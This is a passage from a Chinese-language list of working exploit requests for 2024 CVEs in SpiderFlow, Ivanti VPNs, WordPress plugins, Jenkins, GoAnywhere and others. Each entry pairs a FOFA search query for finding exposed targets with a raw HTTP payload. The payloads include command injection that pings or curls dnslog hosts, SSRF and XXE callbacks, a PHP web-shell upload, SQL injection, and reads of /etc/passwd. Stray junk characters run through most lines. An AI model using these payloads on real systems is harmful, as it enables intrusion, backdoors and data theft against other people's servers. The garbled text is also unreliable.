5 E% C- e# }1 O" d1 _4 mCVE-2024-0195" R/ J7 o- a$ H! E# k( i2 n+ s
FOFA:app="SpiderFlow"
( I0 b6 D L) b$ B, \7 SPOST /function/save HTTP/1.1# Y8 Z$ ?+ l" f: i" n
Host: 192.168.40.130:8088
' n k% g) z/ x$ mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0% A& t/ s! ?( x: ~- Q
Connection: close
0 W3 y& z7 @0 [$ r& e$ }3 BContent-Length: 121% m3 t' J* T4 l
Accept: */*
' r* ~! y9 a1 E. j. gAccept-Encoding: gzip, deflate) S" w" [" B9 o; x1 f
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.20 _0 A% b' ^ X2 y9 j& _5 w8 Q
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
5 C/ V* F* X2 Q5 JX-Requested-With: XMLHttpRequest
0 }! a' X6 P$ ]. @6 m! ]* D% C( O- A4 T: b$ m9 B! J) e
id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B# t) _+ o# E' z( l0 m4 d9 h
( W; _4 g8 @4 G- Q0 i7 r
U P, V9 y5 ^' ^
99. Ncast盈可视高清智能录播系统busiFacade RCE
) b# i! H, q- ]; NCVE-2024-0305
8 V9 o# V* p7 D$ V; Y4 Q+ z- RFOFA:app="Ncast-产品" && title=="高清智能录播系统"/ }/ y4 e7 c; w5 l5 N
POST /classes/common/busiFacade.php HTTP/1.1
& H6 `* S2 V7 Z5 z, j9 i) \7 cHost: 192.168.40.130:8080, h; x/ _! f, F4 `0 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
! a4 z" D. l! S ^$ n8 |Connection: close1 s- }- f8 z) b: X5 G9 s, X" b- a
Content-Length: 154
* n; j9 ^) Q* P0 K: W; c! `Accept: */*. t9 \% u+ a) Z
Accept-Encoding: gzip, deflate
8 w, n+ {0 h) X+ Q3 e4 P8 WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: ~( O/ R: c( E1 A1 a1 H& o
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
# a2 h" H4 Z" p/ U. OX-Requested-With: XMLHttpRequest$ S' Q4 [& O' v6 k$ y
R4 s+ B* ~5 t6 @ U1 a$ O S6 p
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D2 T! a' @1 g- m0 s2 F7 |3 E
?1 s& U9 s0 q" i: L; J# ?+ E5 W
2 j0 S6 a2 m8 \+ t) D7 ~, ~+ n# u100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传+ j9 J+ }9 d1 G$ r2 X! D' q
CVE-2024-0352/ v' `( X- x8 v8 h2 N5 C+ T. Z
FOFA:icon_hash="874152924": k- j$ B# Y4 p
POST /api/file/formimage HTTP/1.15 j! X2 N. B' `. H, Q
Host: 192.168.40.130
/ S$ U8 y% a# E+ u$ a0 E0 V. fUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.365 m- p$ V+ F0 D$ [$ R, V
Connection: close
; \5 _' s: v$ j4 U; |3 WContent-Length: 201
: T- D% A W; lContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
: [) J' S$ j- h. i3 l1 c2 o4 zAccept-Encoding: gzip
?$ L0 f' |# O& t& W& `/ S, O+ h W/ M- Z7 E+ @
------WebKitFormBoundarygcflwtei
- D- {; n8 N/ v/ N- SContent-Disposition: form-data; name="file";filename="IE4MGP.php"& L/ Z& n9 ~6 a0 K; f* u. o
Content-Type: application/x-php% s4 k" ~/ \2 `) Q- u9 P
# e$ z) | x/ X7 y
2ayyhRXiAsKXL8olvF5s4qqyI2O
_" B, [8 @; c3 K------WebKitFormBoundarygcflwtei--; S" k! @% L2 d6 O. l
; Q7 f4 S* x: H
/ F. s" x# f) q, \& N5 J7 F101. ivanti policy secure-22.6命令注入
, s3 _; p! z2 N, I) m% K2 {) v; \1 P$ rCVE-2024-21887$ F2 C7 v* ^1 u2 s
FOFA:body="welcome.cgi?p=logo"! w! Y* ]; m9 x2 F% Z2 B+ `
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1( t5 d7 S4 N; n2 o: A
Host: x.x.x.xx.x.x.x8 a( K" A/ m" l' A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
: e3 {& u2 N" o4 v; s/ V4 _5 TConnection: close
5 ]4 a4 [% ?( g! n8 DAccept-Encoding: gzip
0 R {% t3 B, I t& S' E$ ~+ V# ], P) R
4 s) f7 @3 T% c, ?' @+ v3 v102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
+ ` j- e9 k' y- }CVE-2024-218936 X% N) _( T3 x
FOFA:body="welcome.cgi?p=logo"
5 d( X. n% P/ ~1 a9 oPOST /dana-ws/saml20.ws HTTP/1.1& U# N: `6 S ~5 {
Host: x.x.x.x9 q9 y1 a% Z% k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
9 u' ]! c# N' w. u' @+ i* h# ^Connection: close" W( R' k: n7 S
Content-Length: 792
% f" W) N) G) m% y L2 {Accept-Encoding: gzip
: d' f$ x% Z: l6 W5 S* b
$ p0 \; y' n6 j; {( {: E<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
! R+ {/ x3 s% B+ V; @/ S* Y0 E- {: {% D# v$ \+ c
103. Ivanti Pulse Connect Secure VPN XXE8 R) ?% Q: n$ W/ E
CVE-2024-22024
5 G* G8 N3 f6 u; v0 g+ rFOFA:body="welcome.cgi?p=logo"
3 |9 n4 ?* P5 R- l: T8 M3 N7 I) b2 OPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
/ W' ^" y. z7 @3 d! ?, ?: r zHost: 192.168.40.130:111 `' m0 S; @$ S7 @5 }( |6 Z8 {& n2 H
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.361 @! z& H1 ~' D+ Z) e
Connection: close
- K3 b; ] x- |' jContent-Length: 2048 u0 ~5 A5 j' H6 v9 P0 i
Content-Type: application/x-www-form-urlencoded2 t1 G& M6 K; K( `/ {$ [5 h S
Accept-Encoding: gzip
& O2 q% ]1 Q) V* ^: X* [% x
8 F* ?" s% s5 [6 o6 M' _2 X$ N7 NSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==4 K; Q% P/ ]/ Y. |! T
- w" C- v% Y% X; E9 g, h4 v
/ m$ j4 }- C) G% C4 s6 l$ x3 F( H其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
- e5 `5 i+ y5 m7 x9 ]5 e$ R7 b<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
6 G" H# _& r6 N& ~& G! Q: O4 e
& {! F# v# `% B, o! g0 i
3 O3 V# t9 C! G, a7 E- c104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
" M, Y7 h; c8 h; o/ M' xCVE-2024-0569
) o; Q9 L' y7 j, R& K! MFOFA:title="TOTOLINK"
9 L' e# D9 B$ ]. Y2 m1 hPOST /cgi-bin/cstecgi.cgi HTTP/1.1% F9 i! ^$ s' y3 F2 H& Q
Host:192.168.0.1
$ Z9 z" G; q" S$ W @Content-Length:41
4 D# E: a# K) jAccept:application/json,text/javascript,*/*;q=0.01
! v# }5 G- F9 r7 i4 a, ~X-Requested-with: XMLHttpRequest# z' M+ D) S/ n* P
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36" F3 }5 c+ m7 }& c4 }) e: Q# Z
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
' O8 C7 u/ l$ q' H, iOrigin: http://192.168.0.1/ F; V4 R0 o' K8 [9 ?
Referer: http://192.168.0.1/advance/index.html?time=1671152380564$ ^0 i! `- Z& @: v @
Accept-Encoding:gzip,deflate2 ?$ W) |0 b8 [, [
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.77 c. m1 y# g$ @6 T6 z; B* o
Connection:close
$ ]/ J; {# n; i- N5 n0 I5 n4 a, V) ?) W; V( L9 Q. U' C
{
0 i& T% S+ ^# l) Z"topicurl":"getSysStatusCfg",7 x |% J2 ] I' A
"token":""
3 q, I& z, U. R2 c# s6 d% g- _3 D& z/ {}
0 @2 G5 W+ o& w% c: O9 D" C+ ]/ w8 Z0 x% u
105. SpringBlade v3.2.0 export-user SQL 注入5 h# W ?9 Q5 g+ H/ ]; d9 h
FOFA:body="https://bladex.vip"
2 U" ?7 z* S; I8 _3 z/ }% ?. |http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=17 J6 d3 {: U' H; w# ?+ k. {
- l. F( `" o) Q* }
106. SpringBlade dict-biz/list SQL 注入% H! R/ I6 t# S: M( ?: I9 k6 J
FOFA:body="Saber 将不能正常工作"8 z$ e; {5 A/ V. {& b
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
( i: w" C6 d j1 @8 LHost: your-ip
* H- { h, g$ G& f7 GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.367 a b2 D4 g$ Q; _; h
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
1 W. T' U: k! {. u) i% |6 PAccept-Encoding: gzip, deflate, u9 v0 X6 S5 R) T1 L
Accept-Language: zh-CN,zh;q=0.97 h0 l% W4 |8 m! x' g
Connection: close$ p, u4 B/ L9 `3 f
+ O; r) Y: w! m( F1 H' g
4 S6 i* P0 @/ E107. SpringBlade tenant/list SQL 注入
- T. i& a @1 v- ^) LFOFA:body="https://bladex.vip"
7 o. d! @' b0 b1 p3 n9 \GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
2 M" B2 i7 ~4 }- JHost: your-ip) S; Y- \! t( A7 a2 Z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
6 u/ m$ I8 U; Y: }Blade-Auth:替换为自己的/ l7 J/ I; t1 V" w* {9 B- ]: f; M" i
Connection: close
: s8 d8 K5 @5 N2 L9 m8 n' ?* W& Z f- @# _& w
9 w- k D+ W! r: E& z
108. D-Tale 3.9.0 SSRF: ]5 J$ K& x7 s
CVE-2024-21642
- }: I; ^; p3 r* T. {- m# g* G. cFOFA:"dtale/static/images/favicon.png"
y1 d ~9 b) D; AGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1 c, b4 F" j5 ~ @7 S5 b
Host: your-ip' d, \' e( A1 \
Accept: application/json, text/plain, */*
" v/ R, A6 N4 I0 l4 U0 S( GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36( z& w# {* \* O* B
Accept-Encoding: gzip, deflate6 U) @( N6 k4 S
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8' A4 _7 L( }( j3 t
Connection: close9 b% {& l7 t9 Z8 }5 X; U
: B- Y! {: q: a' K0 K
: x! i9 O: _; v w9 O: |: M y
109. Jenkins CLI 任意文件读取+ q3 ~: [8 w# j& L
CVE-2024-238971 E! n4 I; o0 L7 C
FOFA:header="X-Jenkins"
+ c- q0 _+ {* y+ d2 D- `POST /cli?remoting=false HTTP/1.1
# ~( l- q3 P5 M: g3 w# X cHost:
; `8 ]: E1 T8 uContent-type: application/octet-stream2 d: U3 i+ e" q/ S/ q/ O( F; J
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
. }: W6 Y: l1 x" g! l0 ~& YSide: upload
9 k( M* V1 d+ d& xConnection: keep-alive
$ h$ H! _8 \0 f5 b" l# [Content-Length: 163
6 O6 x! p3 m3 i$ a f- ~1 N1 w- R: g# t3 a o0 V+ M; B+ H! P0 ?
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
1 Z/ z+ `3 E$ E& o6 p! q9 q1 t+ J, o# L
8 `* A# d6 i) b( z9 }POST /cli?remoting=false HTTP/1.1. E4 \& \! M& x. W6 |
Host:
0 Y$ U5 L* Z$ c* X% v4 D" E9 U, SSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e92/ ]& H; K3 \3 A# A. y* `1 G
download
1 C. T B- m2 KContent-Type: application/x-www-form-urlencoded
4 R, X' Z* U4 a) sContent-Length: 0
$ E- f( m3 Q2 _) b b4 M- f- l0 E+ P# h* _$ h: q
. A! _; E, k7 _+ R: j6 D3 H
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
. `7 v7 J6 t4 X$ A4 ejava -jar jenkins-cli.jar help
) q9 F( g" N5 ]5 x* V- n/ I$ d[COMMAND]
1 r% R1 k! \# [6 ^2 V) lLists all the available commands or a detailed description of single command.5 R7 Y, h' _/ x- D0 x% d( d/ }
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
1 R4 X5 {/ |) c$ }( b
& w6 m) x) L, K& v0 G* Y
; f- [+ A- k1 O3 ]" O6 d) Y110. Goanywhere MFT 未授权创建管理员+ O- b0 `; Z0 }, h% z, o+ K
CVE-2024-0204
9 o* i# ?9 R/ x% m, y3 ]FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
* [4 i6 D3 D+ x6 |& x0 CGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
" ~5 b" y( R( YHost: 192.168.40.130:8000
7 F& C/ E6 w3 Q4 E) j4 xUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
1 n2 \. r2 U1 P5 m1 ]Connection: close
# I9 q; B; V9 [0 BAccept: */* o* a5 {1 J3 F* }9 Q, G
Accept-Language: en
0 E& V! B' Z$ a" n$ i: {Accept-Encoding: gzip
5 _( @. Q: x0 h$ X* Z6 ]5 u$ Y- O# ]1 S: {, N9 m: d
3 V: U% N6 x$ \111. WordPress Plugin HTML5 Video Player SQL注入
" j f, j/ Y2 Y8 U- N0 VCVE-2024-1061
. [0 Z( C$ a& o( j, v) ?0 @FOFA:"wordpress" && body="html5-video-player"% o( U1 b1 m2 f( z1 E# u
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
. |% [! Q8 L) }( d; k0 GHost: 192.168.40.130:112! o G _5 k2 [
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
9 |3 h' {5 S" a" a2 lConnection: close
( g3 S4 D+ r$ ?Accept: */*6 A u5 t, P, x( z; c- _; i8 D
Accept-Language: en
# S; N. i* s% j8 |5 Q4 U+ qAccept-Encoding: gzip& ^2 ~/ p9 a: ?
* f; m8 Q; j! I$ w) S% H
: b6 Q4 ~' X* R0 L5 w112. WordPress Plugin NotificationX SQL 注入% }1 l, K7 D" v+ K+ e
CVE-2024-1698* l9 T1 H& x& E. u9 N
FOFA:body="/wp-content/plugins/notificationx"" J' V6 W% Y: z9 P1 S
POST /wp-json/notificationx/v1/analytics HTTP/1.1& M6 ]. R, _/ D D! t9 T" {
Host: {{Hostname}}2 p/ I$ w" j6 C# E7 w3 _
Content-Type: application/json* y4 Q: b3 m( ]9 g- `4 f6 l* f0 S
: i! K) v. k! v$ u( S9 \% J
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
7 n4 ^8 @* h4 ?" f2 ^
$ }8 u3 b, Y$ ]% o- G3 P- W
/ E# t" B: k4 Z, H113. WordPress Automatic 插件任意文件下载和SSRF
3 w, ~0 E0 \3 }$ l6 E3 t1 YCVE-2024-27954. S& {: p$ o" E+ C
FOFA:"/wp-content/plugins/wp-automatic"
/ v) r4 \( `# L; K( f3 rGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.19 z# Q9 d7 ^, V; Y; x
Host: x.x.x.x
3 z2 N8 \6 e% J2 c9 N+ t0 h, lUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
6 C/ W" M, ?. `1 _Connection: close* v: [$ f# v- s D1 H
Accept: */*
7 n9 I7 y0 E8 d% {/ E1 g9 u8 jAccept-Language: en
) e; l8 K; Y) Y1 Z( [Accept-Encoding: gzip; E; |, _/ u' q
" e- p3 E/ v ^2 t
: L7 c# M6 O% c8 e6 c5 K- r
114. WordPress MasterStudy LMS插件 SQL注入+ r9 x" t* [' o( F$ I
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"3 Q$ x; U/ F4 c6 m4 w, h
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.16 k1 c9 h5 |; ?6 K. W! j) [3 s( _
Host: your-ip9 D- e; Y7 k0 X
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
; {" p; W0 \. T/ ^3 QAccept-Charset: utf-8- N2 t# Y* n; t- m3 \. R, @& I
Accept-Encoding: gzip, deflate" y9 N1 l: k6 m- ]0 g8 U
Connection: close
' T5 H, A h7 e. N& b+ h, C+ U
* ]& E2 o& ]3 C) Y! {5 G! Z
h1 ?# N; b4 g2 W) x) b( ?115. WordPress Bricks Builder <= 1.9.6 RCE" e# v; W2 u- T h+ B {5 e
CVE-2024-25600) G$ r6 e2 \0 F0 K' A) ]& l( J
FOFA: body="/wp-content/themes/bricks/"
4 O3 Z8 v6 P v1 g第一步,获取网站的nonce值
( Z4 Y0 p* V( ]- g* L0 S9 bGET / HTTP/1.14 I% o/ g/ @9 s7 `
Host: x.x.x.x
) f! x3 a0 Y; J& uUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.368 F" _; q6 R( u' S3 L, x
Connection: close
* E$ z3 g) h8 y1 X( b/ YAccept-Encoding: gzip
6 e+ Y3 r6 I+ O& i* o$ n& B
$ Y( ?* D$ h% v, C% [9 e) t7 D0 R& j' [& H+ G8 z
第二步替换nonce值,执行命令& h- U/ p7 J+ W
POST /wp-json/bricks/v1/render_element HTTP/1.1, I5 h' a: }. y, y$ @6 z% j
Host: x.x.x.x% j9 o0 v4 e: i' \& V
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* p$ k9 R( J7 m9 x. U
Connection: close! e6 m/ V7 ?- t# Q# h
Content-Length: 3565 K1 C% y1 n) t( @6 f1 E/ ^1 x" R
Content-Type: application/json& `& U% m0 G' q& z+ n% T3 D
Accept-Encoding: gzip
9 _( l+ _6 \8 {1 w9 @0 N- k/ l
* o+ h0 W' P* [) d3 D+ x& j& B{6 W% h8 ?2 p& z& C- D: J. ~
"postId": "1",
9 ~9 K" _" ^! K, [; V0 G "nonce": "第一步获得的值",
2 q- P5 P- O. A: H; s) x "element": {
) Y$ f. K% {* X "name": "container",$ o+ P' @- R% ?! l
"settings": {, V6 n0 @5 V3 x% x
"hasLoop": "true",
4 b9 _: z3 J8 Y "query": {. I2 Q9 F7 \/ ^' _: ~
"useQueryEditor": true,
9 V/ \8 [: `: U5 }( T7 J$ d8 o- [* C "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
B! I# d! t! ] "objectType": "post"6 B2 H9 Z" x8 b) r1 S- F4 R5 h# Q0 C
}' Y K: M: `) M( j* x! s% d4 E
}! H; l2 Z0 [/ ^% V1 ^
}
8 ?+ e# I' B3 x6 G$ O3 _7 E9 Z}2 X+ y, u5 g$ Y9 X5 z. t9 p
" K. g9 S6 F. b8 U
# o7 W3 C& M8 r1 @4 f% N116. wordpress js-support-ticket文件上传
6 g! U7 v) K8 ?7 t! Y. N$ H3 u/ }2 eFOFA:body="wp-content/plugins/js-support-ticket"
- G, [4 B1 e# H& f9 r0 W4 c, D" yPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
( [$ j1 C, g- U/ oHost:
2 g0 @( ~7 h+ m' OContent-Type: multipart/form-data; boundary=--------767099171 ? D" [# r1 `2 Z% X9 Y% y+ n* ?
User-Agent: Mozilla/5.0 }6 f U+ V% m7 g' ?0 \1 ~
$ B5 p; R6 o4 Z1 ?: L- S& X( E----------767099171
, w9 t* I7 R- r+ f$ BContent-Disposition: form-data; name="action"
3 d5 [, |+ Z9 e7 B( Yconfiguration_saveconfiguration d7 S- m$ {. }4 l `/ i6 S+ H
----------7670991715 I- Y3 ~1 T z7 J
Content-Disposition: form-data; name="form_request"
2 o5 J5 F) m' @7 w( h9 l# mjssupportticket" j- X- M# U( K2 @; k0 U
----------767099171
3 K1 |( z V, W$ [- f8 [. SContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php". ?: z u: K; C* h. A: o: s+ w2 F
Content-Type: image/png
/ p+ [; n! I9 U' H+ R& e- e8 l: {: |; t----------767099171--
% h- G. z( U6 D' ~( E6 J8 \# J' X/ r+ l1 |( l/ J; ~
( g8 {$ I5 u* m& F% X+ s117. WordPress LayerSlider插件SQL注入
( B1 r" \5 v _, Lversion:7.9.11 – 7.10.08 h4 o% Z/ h& x1 ~
FOFA:body="/wp-content/plugins/LayerSlider/"+ [3 P7 y& \( c, `5 _; k: W
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.15 u5 n1 O) g% K; g/ D
Host: your-ip/ a# |3 {8 D" S- M$ l P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.03 e3 J* L# O" f, F+ l* f0 [/ A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# T$ \/ f5 ~1 R' q+ W. O# @$ WAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 f [ |. D% @: W! ?Accept-Encoding: gzip, deflate, br2 X6 ^# Y$ K+ y3 D/ g- z. H; ]
Connection: close
- B6 r4 w" Y0 F: Q( FUpgrade-Insecure-Requests: 1
) A, D$ g) ?% K$ `. A c& E8 d" W$ Y
+ L, \* M v2 i1 G" j# I! H
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 \* v! O+ t/ q' b. c9 tCVE-2024-0939
8 |( u3 N' x) [' N: S R7 Y, MFOFA:title="Smart管理平台"
1 z. M$ ^1 q( I% qPOST /Tool/uploadfile.php? HTTP/1.12 X: r6 W/ C% Z& f, U! k/ N+ d! _2 a
Host: 192.168.40.130:8443+ c. \- ?7 l) c3 N1 o( a
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
# O, P0 p* |) g7 g sUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
0 y+ S- `0 z0 R0 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( F( `! N9 U! `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 D5 p- W2 U2 m$ f1 R# \
Accept-Encoding: gzip, deflate
9 m: _) k1 i0 a; ^: FContent-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887' m, |5 {% c }* [9 {' x5 j
Content-Length: 4056 N7 o3 h- w4 m; K, P8 g# k- e }
Origin: https://192.168.40.130:8443
' Q$ ^$ x5 q" F' D7 T8 }8 HReferer: https://192.168.40.130:8443/Tool/uploadfile.php
& v6 `7 w5 t) h. w8 z; m% N7 i4 s( eUpgrade-Insecure-Requests: 1% i- ]3 q7 l8 J" y. a
Sec-Fetch-Dest: document- p4 g+ A% d m' d
Sec-Fetch-Mode: navigate# u# j8 G" G k; }0 a+ f* X
Sec-Fetch-Site: same-origin+ S% Y8 @; H; B0 d, R4 \; E
Sec-Fetch-User: ?1
- l3 |9 Y0 u8 K; r% c6 h/ JTe: trailers( E# H8 y4 z: H5 [$ L
Connection: close; c2 w M8 g# _) E7 K) B5 n9 l5 H1 y
) m0 b0 D0 d) ^) G* K
-----------------------------13979701222747646634037182887
5 S4 u0 F( E* v; E+ D2 @2 F2 M5 rContent-Disposition: form-data; name="file_upload"; filename="contents.php"
* D4 Z2 A6 U. R3 N6 {+ OContent-Type: application/octet-stream
. M3 j, U2 N. X. j% O3 _" t9 P, W9 v& B
<?php# ?# k, Q+ s% `4 u5 K, a b0 @
system($_POST["passwd"]);
* ?, L& V0 g7 c?>9 D5 F; d/ r) V9 o
-----------------------------13979701222747646634037182887
2 I: L6 j T2 h3 Y- Y) ^. VContent-Disposition: form-data; name="txt_path"* z- X$ r$ p% ^$ ^ V
; ]' i+ o% E8 ?( P' Y) |/home/src.php% H S! o3 n' {: \9 ]/ c4 @
-----------------------------13979701222747646634037182887--; y6 S8 u& i1 D4 [0 u
! |9 Z, \5 w' s8 n5 G( e- a
9 y9 x1 J; A) J9 ~" g访问/home/src.php
0 W" k) G! V0 N6 Z, M+ X5 p+ \8 x: Q* q7 [$ O6 B
119. 北京百绰智能S20后台sysmanageajax.php sql注入1 C, j) j+ s: r m
CVE-2024-1254
; K% S. w2 J0 h/ DFOFA:title="Smart管理平台"7 I- j; p* {: X# a7 ]/ P
先登录进入系统,默认账号密码为admin/admin
" L: }1 l9 b, Q+ d* T; p& o( s- UPOST /sysmanage/sysmanageajax.php HTTP/1.11
o) Q. G/ _& K2 z' kHost: x.x.x.x
8 I* H8 {* |4 a& U( @6 LCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
9 v5 F+ R. e/ |User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
( \- B9 [9 W5 ?* p2 tAccept: */*
